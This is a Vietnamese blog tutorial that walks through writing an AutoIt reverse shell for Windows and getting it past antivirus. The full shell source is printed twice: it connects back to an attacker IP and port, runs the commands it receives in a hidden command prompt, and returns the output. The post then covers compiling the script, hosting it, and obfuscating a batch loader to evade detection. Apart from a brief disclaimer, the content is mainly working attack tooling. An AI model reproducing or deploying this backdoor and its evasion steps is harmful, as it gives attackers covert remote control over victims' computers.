Bảo Mật

Cách Hacker Bypass AV xâm nhập Windows với Autoit

Trong thời đại của công nghệ số, khi mà an ninh mạng ngày càng trở nên quan trọng, việc nắm bắt những kiến thức về cách tấn công và phòng ngự là không thể phủ nhận. Với ngôn ngữ lập trình Autoit là một ngôn ngữ kịch bản dễ đọc và dễ hiểu, thường được sử dụng để tạo ra các kịch bản tự động hóa. Tuy nhiên, trong tay của những tin tặc, nó có thể trở thành một công cụ độc hại đầy sức mạnh.

Chúng ta sẽ cùng nhau khám phá cách tin tặc tạo ra một cuộc tấn công Reverse Shell có thể vượt qua các biện pháp chống virus thông thường và làm thế nào Autoit có thể được lợi dụng để thực hiện điều này. Hãy cùng nhau khám phá nhé !

Lưu ý:  Bài viết này chỉ dành cho mục đích giáo dục, nghiên cứu và học tập. RatHuuIch sẽ không chịu toàn bộ trách nhiệm về các hành vi bất hợp pháp !

Giới thiệu ngắn gọn về ngôn ngữ lập trình Autoit

AutoIt là một ngôn ngữ lập trình dành cho hệ điều hành Windows, chủ yếu được sử dụng để tự động hóa các nhiệm vụ. Với cú pháp đơn giản và tích hợp mạnh mẽ với Windows, ngôn ngữ  AutoIt là công cụ linh hoạt cho việc tạo kịch bản tự động, từ việc cài đặt phần mềm cho đến tương tác với giao diện người dùng. Được biết đến với tính ổn định và khả năng tương thích cao, ngôn ngữ lập trình AutoIt là sự lựa chọn phổ biến trong cộng đồng người sử dụng và phát triển phần mềm trên hệ điều hành Windows

Cách Hacker Bypass AV xâm nhập Windows với Autoit

Hacker xâm nhập vào máy tính của chúng ta với nhiều cách thức khác nhau. Nhưng trong bài viết này, mình sẽ đề cập đến kĩ thuật Reverse Shell, đây là một kỹ thuật phổ biến đối với việc xâm nhập hệ thống mạng, nơi các máy tính bị xâm nhập sẽ tạo ra một kết nối với máy tính mục tiêu của kẻ tấn công. Điều này cho phép kẻ tấn công tiến hành các hoạt động xâm nhập từ xa, bao gồm cài đặt mã độc, đánh cắp dữ liệusửa đổi cấu hình hệ thống, v.v. Kỹ thuật này chủ yếu được sử dụng nhằm khai thác độ tin cậy của hệ thống mạng và tạo ra một cửa sổ ảo nhằm thực hiện các hoạt động xâm nhập.

Trước hết, mình sẽ tạo một file có tên là ReverseShell.au3 và đoạn mã bắt đầu bằng việc khai báo các thư viện cần thiết từ AutoIt

#include <AutoItConstants.au3>
#include <GUIConstantsEx.au3>
#include <MsgBoxConstants.au3>

 

Tiếp đến, địa chỉ IP và cổng của máy chủ điều khiển được đặt trong các biến toàn cục. Trong trường hợp này, máy hacker được đặt với địa chỉ IP là 127.0.0.1 (localhost) và cổng là 4444

Global $host = "127.0.0.1"
Global $port = 4444

 

Định nghĩa một biến toàn cục để lưu đường dẫn hiện tại của máy nạn nhân

Global $currentDir = @WorkingDir

 

Trong vòng lặp vô hạn, đoạn code này sẽ kiểm tra xem máy nạn nhân có thể truy cập được đến máy hacker không, bằng cách sử dụng hàm Ping. Nếu máy nạn nhân có thể truy cập được, nó sẽ thử kết nối đến máy hacker điều khiển thông qua giao thức TCP. Nếu kết nối thành công, vòng lặp sẽ thoát. Và ngược lại, nếu không kết nối được, đoạn code sẽ tiếp tục chạy đến khi kết nối thành công

While 1
    If Ping($host, 250) Then ; Check if the server is reachable
        TCPStartup()
        $socket = TCPConnect($host, $port)
        If $socket <> -1 Then ; Check if the connection is successful
            ExitLoop ; Exit the loop if the connection is established
        EndIf
        TCPCloseSocket($socket)
        TCPShutdown()
    EndIf
    Sleep(1000) ; Wait for 1 second before retrying
WEnd

 

Sau khi máy nạn nhân kết nối được tới máy hacker, máy nạn nhân sẽ gửi đường dẫn hiện tại đến máy hacker

TCPSend($socket, $currentDir & "> ")

 

Khi đã kết nối, máy nạn nhân tiếp tục lắng nghe để nhận các lệnh từ máy hacker điều khiển. Nếu lệnh nhận được bắt đầu bằng “cd”, nó thực hiện lệnh thay đổi thư mục. Nếu không, nó thực hiện lệnh trên hệ điều hành và gửi kết quả về máy của hacker

While 1
    If @error Then ExitLoop
    $recv = TCPRecv($socket, 1024)
    If $recv <> "" Then
        If StringLeft($recv, 3) = "cd " Then ; Check if the command is a change directory command
            $dirToChange = StringTrimLeft($recv, 3)
            $dirToChange = StringStripWS($dirToChange, 3) ; Remove leading/trailing whitespaces
            If FileChangeDir($dirToChange) Then
                $currentDir = @WorkingDir
                TCPSend($socket, $currentDir & "> ")
            Else
                TCPSend($socket, "[!] Failed to change directory" & @CRLF)
                TCPSend($socket, $currentDir & "> ")
            EndIf
        Else
            $cmd = Run(@ComSpec & " /c " & $recv, "", @SW_HIDE, 2)
            $stdout = ""
            While @ComSpec & " /c " & $recv <> ""
                $line = StdoutRead($cmd)
                If @error Then ExitLoop
                $stdout &= $line
            WEnd
            $ret = TCPSend($socket, $stdout)
            TCPSend($socket, $currentDir & "> ")
            Sleep(500)
        EndIf
    EndIf
WEnd

 

Sau khi hacker hoàn thành mục đích của mình, đoạn code AutoIt sẽ đóng kết nối TCP và tắt thư viện TCP

TCPCloseSocket($socket)
TCPShutdown()

 

Đây là toàn bộ đoạn mã:

#include <AutoItConstants.au3>
#include <GUIConstantsEx.au3>
#include <MsgBoxConstants.au3>

Global $host = "127.0.0.1"
Global $port = 4444

Global $currentDir = @WorkingDir

While 1
    If Ping($host, 250) Then ; Check if the server is reachable
        TCPStartup()
        $socket = TCPConnect($host, $port)
        If $socket <> -1 Then ; Check if the connection is successful
            ExitLoop ; Exit the loop if the connection is established
        EndIf
        TCPCloseSocket($socket)
        TCPShutdown()
    EndIf
    Sleep(1000) ; Wait for 1 second before retrying
WEnd

TCPSend($socket, $currentDir & "> ")
While 1
    If @error Then ExitLoop
    $recv = TCPRecv($socket, 1024)
    If $recv <> "" Then
        If StringLeft($recv, 3) = "cd " Then ; Check if the command is a change directory command
            $dirToChange = StringTrimLeft($recv, 3)
            $dirToChange = StringStripWS($dirToChange, 3) ; Remove leading/trailing whitespaces
            If FileChangeDir($dirToChange) Then
                $currentDir = @WorkingDir
                TCPSend($socket, $currentDir & "> ")
            Else
                TCPSend($socket, "[!] Failed to change directory" & @CRLF
                TCPSend($socket, $currentDir & "> ")
            EndIf
        Else
            $cmd = Run(@ComSpec & " /c " & $recv, "", @SW_HIDE, 2)
            $stdout = ""
            While @ComSpec & " /c " & $recv <> ""
                $line = StdoutRead($cmd)
                If @error Then ExitLoop
                $stdout &= $line
            WEnd
            $ret = TCPSend($socket, $stdout)
            TCPSend($socket, $currentDir & "> ")
            Sleep(500)
        EndIf
    EndIf
WEnd

TCPCloseSocket($socket)
TCPShutdown()

 

Tiếp theo, hacker sẽ biên dịch tập lệnh ReverseShell.au3 thành ReverseShell.a3x

Hacker Bypass AV xâm nhập Windows với Autoit

 

Khi quá trình biên dịch hoàn tất, hacker mở một máy chủ web để lưu trữ file autoit.exe và ReverseShell.a3x để chuẩn bị thực hiện tấn công. Và ở đây mình đã chuẩn bị sẵn một tập lệnh Batch tên là RS.bat có nội dung như sau:

Hacker Bypass AV xâm nhập Windows với Autoit

Giờ thì mình sẽ vào trang web https://www.batch-obfuscator.tk/ mã hóa file RS.bat này để vượt qua AntiVirus

Cách Hacker Bypass AV xâm nhập Windows với Autoit 6

Cách Hacker Bypass AV xâm nhập Windows với Autoit 7

 

Sau đây là kết quả scan của Virustotal: https://www.virustotal.com/gui/file/e18726a16d26bd432fd422a6a34636d61cfea23fde3a79639bd0cabb548fbfee?nocache=1

Bypass Antivirus với Autoit

 

Video demo:

Như vậy, bằng cách tận dụng tính linh hoạt và khả năng tùy chỉnh của AutoIt, tin tặc có thể tạo ra các script độc hại mà các chương trình antivirus thường không nhận diện được. Một số phương pháp mà hacker thường sử dụng là thay đổi mã độc hại liên tục để tránh bị phát hiện, sử dụng kỹ thuật mã hóa hoặc thay đổi cấu trúc của mã để tránh nhận dạng bởi các phần mềm bảo mật. Cùng với đó là tận dụng các lỗ hổng trong hệ thống và sự sáng tạo trong việc tạo ra các kỹ thuật xâm nhập mới, tin tặc có thể tạo ra các công cụ xâm nhập mạnh mẽ, khó bị phát hiện và gây nguy hiểm đến các hệ thống. Từ đó, chúng ta cần phải luôn cập nhật và nâng cao kiến thức bảo mật để bảo vệ chính bản thân mình cũng như bảo vệ môi trường kỹ thuật số.

 

Đọc thêm: Mình đã Bypass AV xâm nhập Windows 10 với Metasploit và Python như thế nào ?

Đánh giá post

Rất Hữu ích

RatHuuIch là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. RatHuuIch cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Bài liên quan

Theo dõi
Thông báo của
guest

0 Góp ý
Phản hồi nội tuyến
Xem tất cả bình luận
Check Also
Close
Back to top button